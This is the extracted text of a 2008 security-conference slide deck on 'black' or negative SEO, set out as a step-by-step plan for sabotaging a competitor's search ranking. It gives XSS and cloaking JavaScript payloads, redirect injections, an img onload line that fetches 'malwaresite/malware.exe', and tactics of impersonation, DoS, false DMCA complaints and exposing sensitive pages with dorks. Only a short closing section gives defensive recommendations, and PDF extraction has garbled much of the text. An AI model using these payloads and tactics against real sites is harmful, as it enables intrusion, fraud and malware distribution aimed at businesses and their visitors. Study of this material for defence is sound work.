Rsl none more black the dark side of seo by Spyros Langkos

None More Black: The Dark Side of SEO

Presented By Roberto Suggi Liverani ÂŠ 2008 Security-Assessment.com

About me Roberto Suggi Liverani

Security Consultant - Security-Assessment.com http://www.security-assessment.com h // CISSP Web App Pen Tester OWASP New Zealand Founder/Leader -

htt // http://www.owasp.org/index.php/New_Zealand /i d h /N Z l d

Personal Site: http://malerisch.net

Agenda Introduction

SEO (Search Engine Optimisation) – concepts, definitions Black l k SEO – definition, d f security implications l Black SEO Exposed:

Methodology – the big plan Reconnaissance – information gathering is the key Target Resources Elimination – indirect attack techniques Frontal attack – direct attack techniques Collateral damage – other attack techniques Tools – weapons p of SEO destruction Recommendations Case Study: personalsoftwarefinance.com – the target! © 2008 Security-Assessment.com

Introduction Top Ten Search Engine Result Page (SERP) High Competitive Market

3rd

- Rank/Position

Search Engine Optimisation

Introduction Top Ten Search Engine Result Page (SERP) High Competitive Market

3rd

- Rank/Position

Introduction SEO – Search Engine Optimisation Search engine optimisation (SEO) is the process of improving the

volume and quality of traffic to a web site from search engines via "natural" ("organic" or "algorithmic") search results for targeted keywords.

TOP 10 search engines results page (SERP) = SEO industry Some SEO terms: positioning, ranking, keywords SEO Hats:

White Hat SEO: web promotion techniques following search engine guidelines

Black Hat SEO: web promotion techniques not following any guidelines

Black SEO - Definition Black SEO Security Concept Map

Security Implications 1/2 The common perception towards black SEO:

Google: “There's almost nothing a competitor can do to harm your ranking or have your site removed from our index” index

General Assumption: “Black SEO is only related to SEO” Black SEO and Security:

IT Security still does not include this category of attacks Most M t IT Security S it literature lit t does d nott even mention ti the th SEO tterm The potential:

Black SEO attacks do not always involve exploitation of target vulnerabilities

50% of the OWASP Top 10 can be used to leverage black SEO attacks

Knowledge gap between SEO hackers and WEB hackers is reducing - Latest web spam techniques exploit XSS

Security Implications 2/2 Black SEO security considerations:

Three elements in the security model:

Search engine internal processes are not disclosed Real unknown variable in the black SEO security model Black SEO attacks:

Search engines process the attack Attack results are not direct ((might g be visible after 3 days, y ,1 week, 1 month or might not be processed)

Methodology

If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for eevery e y victory cto y ga gained ed you will also a so suffer su e a defeat. de eat If you know o neither the enemy nor yourself, you will succumb in every battle. - Sun Tzu

ÂŠ 2008 Security-Assessment.com

Methodology Black SEO methodology:

Target Reconnaissance Target Resources Elimination l Frontal Attack Collateral Damage The weapons:

Search Engines, Hacking Tools, Black Hat SEO techniques, Spam Tools

What does black SEO attack?

Home/Landing Page - www.targetsite.com Specific web page - www.targetsite.com/product/xyz.htm

Reconnaissance

http://www.flickr.com/photos/kden604/203323823/

ÂŠ 2008 Security-Assessment.com

Reconaissance Build target backlinks/neighbors map. map Include:

Key (authoritative) target resources with high Page Rank Direct incoming links l k to target 2nd/3rd Level incoming links to target Outcoming target links Approach target as complex structure with relationships: Business Target

Political Target

The parent company

Political Party

Subsidiary companies

Political Election/Campaign

Sister companies

Political Affiliates

Significant business partners

Supporting Politicians

Brands/Divisions

Reconaissance Build target backlinks/neighbors map. map Include:

Key (authoritative) target resources with high Page Rank Direct incoming links l k to target 2nd/3rd Level incoming links to target Outcoming target links

Reconaissance Other elements to consider:

Target Annual reports / Press-Releases Target contact names andd emaill addresses dd Target locations and branches Target mergers/acquisitions, elections Job/political boards, either internal to the target or external sites Disgruntled employee or opposite faction blogs

Reconnaissance - Tools Extrapolate target links from search engines: Google

site:targetsite.com – indexed d d pages off target site link:targetsite.com – pages that link to target site cache:targetsite.com – current cache of target site info:targetsite.com – information on target site related:targetsite.com – pages similar to target site targetsite.com -> enter full URL into the search fields (+ all subdomains combinations)

Google News, Google Groups and Google Alerts Yahoo: Site Explorer - http://siteexplorer.search.yahoo.com/

http://targetsite.com – includes pages indexed and pages that li k to link t target t t site it

Reconaissance - Tools Live Search Macros http://search.live.com/macros/default.aspx?FORM=BJJK

Create an advanced search Macro on target site/web page Other tools:

web.archive.org web archive org – useful to identify content linked in the past Maltego: excellent tool to display structure of any entity on the internet. te et http://www.paterva.com/web2/Maltego/maltego.html ttp // pate a co / eb / a tego/ a tego t

http://www.scrutinizethis.com/ http://www.abouturl.com/index.php http://www abouturl com/index php http://whois.domaintools.com http://netcraft.net http://netcraft net http://www.webmaster-toolkit.com/ http://www.myipneighbors.com/ htt // i i hb / © 2008 Security-Assessment.com

Reconaissance - SEO Tools Extrapolate target SEO data:

Firefox add-on: Seoquake (https://addons.mozilla.org/enUS/firefox/addon/3036)

Identify target SEO skills, skills keywords and SERP positioning:

Check if target uses Google Web Master and/or Yahoo Site Explorer po e

Check if target is practicing any SEO techniques Scan target with SEO software

Webceo - http://www.webceo.com

Check target g backlinks

http://www.linkhounds.com/link-harvester/backlinks.php

Eliminating target resources

ÂŠ 2008 Security-Assessment.com

Eliminating target resources The neighbours target map (visual concept):

Thinking like a search engine:

A link to a ppage g = casting g a vote Votes are related to a specific content/information Many votes to a site indicate that the site is “authoritative” authoritative / “trusted” for a specific content = best value to user

Eliminating target resources Eliminating target resources:

Remove/divert links from authoritative/trusted sites to target site Remove/divert /d direct d incoming links l k to target site Two main attack approaches:

Hack neighbours sites and remove links Social engineering + direct attack First approach not always feasible. Second approach: Impersonate target and social engineer target resources Motives to remove/divert link: rebranding, restructuring, maintenance, new domain, spam links, etc. Enforce case with new domain registered as target, XSS/SQL injection, spam links, etc.

Eliminating target resources A possible attack scenario:

Impact: p

Frontal attacks

ÂŠ 2008 Security-Assessment.com

Frontal Attacks Table Frontal attacks classification Scope

Exploit Complexity

Probability of success

Attack Timeframe

Decrease: • rank • position • backlinks

Low/Medium

High/Medium Long

• Reversing search engines

• Web Spam as a proof

• Crawling • Indexing • Caching

Demonstrate: target is: • deceitful • fraudulent • spamming p g

High

Low/Medium

Medium

• Target vulnerable • Low quality/quantity target backlinks • Moderate/Absent target SEO skills

• Human review of spam reports

• Tools speed indexing (quantity/quality)

Impact Position/Rank decreased

Target ban/penalisation

The two scopes p and the techniques q involved have completely p y opposite results Attacker makes a choice depending on: available timeframe, resources, skills kill and d target t t exploitability l it bilit © 2008 Security-Assessment.com

Decreasing target positioning Attack: Spam social bookmarks with target URL

Digg.com, Reddit.com, Onlywire.com, etc Automatic script + sociall bookmarks b k k API http://www.onlywire.com/api/add?url=http://targetsite&ti tle=targetsite&comments=targetsite&tags=targetsite

Impact: Target can be banned. Target site loses links from trusted/high PR domains Attack: Duplicate target content in:

target site (exploit stored XSS or SQL injection) domain with higher PR of target site (buy another site) many sites (build network of clones) Impact: Target penalised for duplicate content

Decreasing target positioning Attack: Submit web proxy + target site to search engines

Use proxy with a higher PR and/or higher number of backlinks than target

Use proxy that do not obfuscate target URL http://www.zzoop.com/index.php?=&=http://targetsite/ http://www.zzoop.com/index.php? & http://targetsite/

Impact: target position may drop suddenly Attack: Mass submissions of target to low quality web directories

Most of them are free. Low quality = n/a or PR 0 Publication can take up to 6 months. Do mass submission. http://www.web-directories.ws Impact: Decrease quality of neighbours. Position decreased.

Decreasing target positioning Attack: Create backlinks to unused target subdomain

www.targetsite.com – 200 OK (used/promoted) targetsite.com – 200 OK (not ( used) d) <- backlinks b kl k target No 301 redirection and both subdomains must point to same content

Impact: Positioning affected Attack: DoS target

Spider needs a 404 Not Found response from target Then request removal of unavailable target pages Impact: Target page removed from SERPS

Decreasing target positioning Attack: Promote target site URL + dynamic content such as:

Session IDs Variables bl with h long l values l http://targetsite/?PHPSESSIONID=a8s7d8782378273827381273821s98d&productId=a9 982938219038291832918391389218931&a2=9sa8d9as7d9a7d98sa7d8sa7d8asdsa&b2=1203 18291289381938921&login=true

Impact: positioning decreasing, pages removal or no pages caching Attack: Promote competition of target using White Hat SEO competition target competition Impact: positioning decreased © 2008 Security-Assessment.com

Decreasing target positioning Attack: Build fake content based on target keywords

Turn everything from the target keywords into education content which provides real value to end user

Target perceived as spammer

Alonzo: [after killing Roger and shooting Jeff] It's not what you know, it's what you can prove. Training Day, 2001

ÂŠ 2008 Security-Assessment.com

Target perceived as spammer Attack: Inject permanent links pointing to bad sites into target <a href=http://badsite>target site keywords</a> <a href=http://badsite>spam keywords</a>

Exploit l stored d XSS, SQL injection in target Injection must be stealth, deceitful, smart, balanced Attack should last as long as possible If possible, make cross links between target and bad sites Impact: Penalisation and/or ban of target site Bad site can contain:

Target perceived as spammer Bad site can be:

PayPerClick Page/Blog/Fake Directory/Fake Forum/Scraped Page Bannedd Phishing Thin Affiliate Free link Exchange Bad site can use:

JavaScript Redirects - JavaScript used for cloaking Keyword Stuffing - overloaded page with excessive keywords Backdoor ppages g –p page g that hides backdoor (+ ( redirection)) 100% Frame – frameset with one frame 100% to deceive search engines spiders

Target perceived as spammer

Hidden text/Hidden Links – hidden content with intention to deceive search engines

Foreign Language – foreign language with intention to confuse search engines

Sneaky Redirects – redirection through rotating domains Same class C IP addresses and same domain registrant details of target site

Target perceived as spammer Attack: Promote target XSS link http://targetsite.com?search=a”><a href=http://badsite>target site keywords</a><!— http://targetsite.com?search=a”><iframe src=\\badsite></iframe><!— http://targesite.com?frameurl=http://badsite p g p http://targetsite.com?redirect=http://badsite

Links must point to bad sites Promote XSS link + target keyword with black-hat SEO Use link farms, splogs, guest books, forums, any article/page th t enable that bl comments t with ith good d PR

Target site needs to appear in top 10 SERP for the keyword promoted

If attack is successful, report target to search engines with search URL,, keyword y and target g URL

Impact: Penalisation and/or ban of target

Target perceived as spammer Attack: Inject cloaking JavaScript into target site <script language="JavaScript"> var r=document.referrer,t="",q;if(r.indexOf("google.")!=1)t="q";if(r.indexOf("msn.")!=-1)t="q";if(r.indexOf("live.")!=1)t="q";if(r.indexOf("yahoo.")!=-1)t="p";if(r.indexOf("altavista.")!=1)t="q";if(r.indexOf("aol.")!=-1)t="query";if(r.indexOf("ask.")!=1)t="q";if(document.cookie.length==0 && t.length && (document.URL.indexOf("?cloakhook=")!=-1 && ((q=r.indexOf("?"+t+"="))!=1||(q=r.indexOf("&"+t+"="))!=-1)){window.location="http://badsite/";}</script> 1||(q r.indexOf( & +t+ ))! 1)){window.location http://badsite/ ;}</script>

Cloaking must point to bad sites Promote cloaking hook with black-hat SEO <a href=http://targetsite.com/?cloakhook=10>any keyword</a>

If attack is successful, report target to search engines Impact: p Penalisation and/or / ban of target g

Target perceived as spammer Attack: Inject redirection into target

HTML meta tag refresh with a very short time JavaScript triggering redirection d onmouseover event <META http-equiv="refresh" content=“0;URL=http://badsite/buyviagra.php"> <body onmouseover=“document.location(‘//badsite/buyviagra.php’)>

Impact: Penalisation and/or ban of target Attack: Splog target

Use spam script/tool that leaves target URL in thousands of blog comments and forums

Create large number of blogs spamming target and using syndicated services such as RSS to be used in blog pings

Target perceived as spammer Attack: Exploit XSS vulnerability in trusted sites to promote target

Create link farm to index XSS link to target site Xssed.com d lists l vulnerable l bl sites with h high h h PR <a href=‘http://www.imdb.com/List?locations="><iframe src=//targetsite.com> </iframe>’>keyword to be ranked</a> <a href =‘http://help.yahoo.com/bin/help/redirect.cgi?to_url= http://targetsite.com’>keyword to be ranked</a>

Attack: Spam target in universities pages, forums, sites with high PR

Some EDU pages are available at low price Use target name in the account name (reflected in URL) <a <a <a <a <a

href=‘http://groups.google.com/group/targetsite’>keyword</a> href=‘http://www.bebo.com/targetsite’>keyword</a> h f ‘htt // b b /t t it ’ k d / href=‘http://www.mixx.com/users/targetsite’>keyword</a> href=‘http://infostore.org/user/targetsite’>keyword</a> href=‘http://cgi.cse.unsw.edu.au/~targetsite/targetsite.html’>keyword</a>

Target perceived as spammer Attack: Store copyrighted material into target site

Material pertinent to target from copyrighted sources (books, encyclopaedias white papers encyclopaedias, papers, etc etc.))

Issue DMCA complaint if target is US based to search engines and to target ISP

Impact: target site page temporary removal (legal case) Attack: ttac Spa Spam ta target get ssite te in spa spam page

Use comments in spam page illegally ranking in top 10 SERPS Exploit XSS, XSS SQL injection or any injection Report both spammer and target to search engines

Target perceived as spammer Attack: Buy paid links on behalf of target

Paid links marketplaces:

www tnx net - www.isellpagerank.com www.tnx.net www isellpagerank com

Inject links identified as “paid links” into target Attack: Show target is selling paid-links paid links

Target site must have a good PR (at least 3 or 4) Sell S ll links li k on target t t behalf b h lf through th h link li k marketplaces k t l Inject links on sale through stored XSS or SQL injection Attack: Trade links on behalf of target

Impersonate target to send emails for link trading Inject links through XSS, SQL injection or any injection In all cases, report target to search engines Impact: target site removal/penalisation © 2008 Security-Assessment.com

Collateral Damage

http://www.flickr.com/photos/mongol/447087265/

ÂŠ 2008 Security-Assessment.com

Collateral Damage Collateral damage: damage in terms of web marketing context, context reputation/image Attack: 302 hijacking target

Well known Google bug (not completely fixed) Point many 302 redirections to target site Implement cloaking on landing page Target Target hijacked Impact: target site content displacement

Collateral Damage Attack: Create a malware connection with target

Malware hosted on target site or on a third party site Inject JavaScript which h h launches l h malware l <img src=a.gif onload=javascript:document.location.href='http://malwaresite/malware.exe'; />

Report target site to: Stopbadware.org - McAfee Site Advisor – AVG Link Scanner

Impact: I t Target T t Sit Site P Public bli Image I Attack: Google bombing/bowling target site with negative keywords

Still works on Google, Yahoo and Live Pickup a non-common / negative-impact keyword Promote target site link with negative keyword in good quality link farm

<a href=‘http://targetsite’>bad keyword</a>

Collateral Damage Attack: Spy on target

Impersonate web anti-spam organisation Warn target competition about b target using black-hat bl k h SEO techniques

Impact: possible legal action against target Attack: Att k Expose E ttargett sensitive iti pages tto SERPS

Example: hidden directories, awstats, webalyzer, admin, URL with username/password, username/password etc

Google Dorks from GHDB http://johnny.ihackstuff.com/ghdb.php Make target link indexed by search engines Impact: exposure of statistics and sensitive data useful to competition © 2008 Security-Assessment.com

Collateral Damage Attack: Expose target sensitive pages to SERPS

Example: hidden directories, awstats, webalyzer, admin, URL with username/password, username/password etc

Google Dorks from GHDB http://johnny.ihackstuff.com/ghdb.php Make target link indexed by search engines Impact: exposure of statistics and sensitive data useful to co pet t o competition

Weapons of SEO Destruction Xrumer – http://www.botmaster.net/more1/ http://www botmaster net/more1/

Autosubmitter Large database d b off forums, f groups pages available l bl Advanced control on threads and posts Captcha and pictocode support ProxyURL – http://www.esrun.co.uk/blog/proxy-url-creator/

Generates large list of proxy urls Sed (Search Engine De-optimisation) ** v0.2 RELEASED** http://malerisch.net/tools/negativeseo/sed.zip

Page generator with hidden text technique, target keyword stuffing in meta tags, tags title tags and other HTML elements

sed

ÂŠ 2008 Security-Assessment.com

sed

Keyword y stuffing on title with target keywords

Spam keywords associated to t target t URL Use of different Headers Target keyword

Meta keywords with spam keywords HTML comments with spam keywords

Latest phishing URL extracted t t d ffrom Millersmile archive and associated to target keyword

ÂŠ 2008 Security-Assessment.com

sed Â&#x192; Sed deployment scenario

ÂŠ 2008 Security-Assessment.com

Case Study Personalsoftwarefinance.com Personalsoftwarefinance com – fake company selling fake software Experiment environment factors:

Major Searchh Engines involved l d (Google, ( l Yahoo) h ) Primary keywords: personal software finance Domain name: personalsoftwarefinance.com ICANN Registrar: Godaddy.com Reputable Web Hosting: successfullhosting.com SEO Tools used: Web Seo + common SEO techniques from articles, books, etc

Web stats tools: awstats, webalizer, hsphere panel tools Site is vulnerable to common web vulnerabilities such as stored XSS, SQL injections, XSRF

Case Study Time for the video!!!

ÂŠ 2008 Security-Assessment.com

Recommendations Security Recommendations:

Secure the site - OWASP Testing Guide Subscribe b b to Google l Webmaster b Tooll and d Yahoo h Site Explorer l Check incoming and outcoming links periodically Set Google Alert Check/monitor web server logs constantly Disable 302 temporary redirection if used Do not use redirection functions Check periodically web server directory and application source code for changes/presence of backdoors

Conclusions And remember remember... Â&#x192; Q: What can I do if I'm afraid my competitor is harming my ranking in Google? Â&#x192; Google: There's almost nothing a competitor can do to harm your ranking or have your site removed from our index. If you're concerned about another site linking to yours, we suggest contacting the webmaster of the site in question. Google aggregates and a d organizes o ga es information o at o pub published s ed o on tthe e web; eb; we e do don'tt co control to the content of these pages.

ÂŠ 2008 Security-Assessment.com

Thanks!

http://www.security-assessment.com http://www.security assessment.com Roberto Suggi Liverani roberto.suggi@security-assessment.com

ÂŠ 2008 Security-Assessment.com

References/Links Negative SEO articles

Black - Negative SEO Hits Mainstream Media

Companies Offer to Damage Your Competitors Search Engine Rankings

Companies p subvert search results to squelch q criticism

Condemned To Google Hell - Forbes.com

'Google bowling' and negative SEO All fair in love and war Searchlight - An SEO blog by Stephan Spencer - CNET Blogs

Firms use evil SEO to kill rivals' Google rankings : News : Security - ZDNet Asia

Google allowing other webmasters to damage your site

Google-Proof PR - Forbes.com

In Pictures 7 Ways Your Site Can Be Sabotaged - Forbes.com

Having Fun at Donalds Expense - So How's this Happening? | Threadwatch.org

Google's Matt Cutts' Blog GoogleWashed | Threadwatch.org

Give me money or I will drop your Google Rank - Search Engine Watch Forums

Fighting Off Negative Publicity and Affiliates in the SERPs : SEO Book.com

Google Keeps Tweaking Its Search Engine - New York Times

Google Should Offer Self Defense Against Spammy Inbound Links

Google's Cookie

Michael Sutton's Blog : A Tour of the Google Blacklist

Matt Cutts Google g bowling g exists Threadwatch.org g

Kick Your Competitor With Negative SEO? - Google Blogoscoped Forum

Negative SEO - Harming Your Competitors With SEO Negative SEO (Black SEO) Tactics - Fighting Dirty

Negative SEO At Work: Buying Cheap Viagra From Google’s Very Own Matt Cutts - Unless You Prefer Reddit? Or Topix? ::

My First Million on the Internet: Google Bowling and Negative SEO: Tearing Down Rather Than Building Up

SEOmoz | Del.icio.us Cloaking to Combat Spam

References/Links Negative SEO articles

SEOmoz | The Dark Side of Wikipedia

The Saboteurs Of Search - Forbes.com

SEOmoz SEO isn�t hacking g - and data securityy tips p

SEO poisoning attacks growing

Google Penalization: Text Links, Redirects Not Likely Causes - Spam Comment Links Maybe - The Story Continues - Robin Good's Latest News

Other sites can hurt your ranking | JLH Design Blog

Building Authority Websites The Right Way | Denver SEO Guy | Knox in Denver

How Much Money is a Top Google Ranking Worth to Your Business?

Google allowing other webmasters to damage your ranking

Why should I report paid links to Google?

Small treatise about e-manipulation for honest people

Forums/Blogs

Bl k Hat Black H t SEO Black Bl k Hat H tF Forum - Powered P db by vBulletin B ll ti

Blackhat SEO

BlackHatCrew - Elite Webmaster SEO Forum

Blackhat SEO » Blog Archive » Free blog hosts Digerati Marketing - The better search blog

Earl Grey`s Black Hat SEO Forum and SEOBlackhat SEM Community - The first and leading Resource on Blackhat SE0 Happar.com Support Forum / Register

Evaluating Google Search Quality | Bruce Cat dot com evilgreenmonkey

Google Search News

Matt Cutts Gadgets, Google, and SEO IncrediBILL's Random Rants

Half’s SEO Notebook

References/Links Forums/Blogs:

IrishWonder’s SEO Consulting Blog

Negative SEO blog SEOassassin

Network Securityy Research and AI ø Blue Hat SEO-Advanced SEO Tactics ø

SEO Black Hat Forum

SEO Black Hat SEO Blog

SEO Chicks |The SEO Blog with attitude

roguespammer: A Rogue Spammer

Search Engine Cloaking and Optimization Forum - SeoJeans / Hot Topics

Stefan Juhl » Internet marketing, SEO & online media monetization Welcome to Seocracy.com

Search Engine Marketing Tips & Search Engine News - Search Engine Watch

SEO Forum

Negative/Positive SEO Techniques:

302 Google Jacking - Has your page been hijacked - Home "Filler Friday: Google Bombing" from Über - Better than you, daily!» H How D Do Th The D Duplicate li t C Content t t Filt Filters Work? W k?

8 ways to abuse your XSS vulnerabilities - stefanjuhl.com

Better search engine ranking Google ranking tips from a Google employee

Better search engine rankings The risk of over-optimization How to remove your competitors from MSN Live!

Hijack A Domain For 200$ at Conceptualist.com, By Sahar Sarid Funny Google's Cache Error

Google and the Mysterious Case of the 1969 Pagejackers || kuro5hin.org

Google Proxy Hacking: How A Third Party Can Remove Your Site From Google SERPs

Link schemes

http://tech.propeller.com/viewstory/2006/07/22/google-has-a-6-month-penalty-for-using-expired-domain/

Improve search engine rankings

References/Links Negative/Positive SEO techniques:

Improve search engine rankings Insider information about Google's ranking algorithm Own-the.net (Webappsec, SEO, and general Web Dev)

SEOmoz | XSS - How to get 20 .gov links in 20 minutes

Using Canonical Domains to Sabotage Competitors in Google Threadwatch.org

Stop 302 Redirects and Scrapers from Hijacking Web Page PR - Page Rank

SpewMoney™ » Blog Archive » Getting traffic from Facebook or How her milkshake brings all the boys to my website SitePoint Blogs » example.com vs. www.example.com… trouble!

Google Proxy Hacking: How A Third Party Can Remove Your Site From Google SERPs

The Dark Side of Search Engine Optimization - Organic SEO Wiki

Official Google Webmaster Central Blog: The Impact of User Feedback, Part 1

SEO tools/software:

Blackhat SEO - Esrun » Blackhat SEO Scripts

Black Hat SEO Software Built to Make Money Fast - Black Hat Software

Blackhat SEO - Esrun » GMAIL Account Creator [GAC] Dark SEO Programming

Dark SEO Programming » captcha

Dark Seo Team

dnScoop - Domain Name Value, Value History, History Stats Tool and Forums

Free URL Redirection, No Ads! Short Free Domain Name (you.co.nr)

Google Remove URL - One for the Good Guys! » SEO Image Blog: Stardate http://sb.google.com/safebrowsing/update?version=goog-black-url:1:1

Free Web Analytic Analytic, Search Engine Engine, Page Rank and SEO Optimization Tools - Are you GoingUp?

OnlyWire: The Only BookMarklet You'll Ever Need!

Pagerank 10 #dS.t ~ darkseoteam.com Pagerank 9 #dS.t ~ darkseoteam.com

References/Links SEO Tools/Software:

Pagerank 10 #dS.t ~ darkseoteam.com

Pagerank 9 #dS.t ~ darkseoteam.com

Report p a Spam p Result Search engine g SPAM detector

SearchStatus | Firefox SEO Toolbar Extension

Proton TM

Recherche Fresh Bdd Google . darkseoteam.com .

Rojo - the best free RSS and Atom feed reader Scraping and Posting your way to money on the Internet - Oooff.com Oooff com

Squidoo : Explore Lenses

the-cloak home

Web Spam Detection

Whois lookup and Domain name search

Who's linking to you? List your referrers, referers, http_referer, referer, referrer

SerpArchive

Web Directory List Ordered By Weakest Google PageRank

top referrers for webmasters SitePoint Marketplace

Save A Sale : Automated Sales Agent Search Engine Friendly Redirect Checker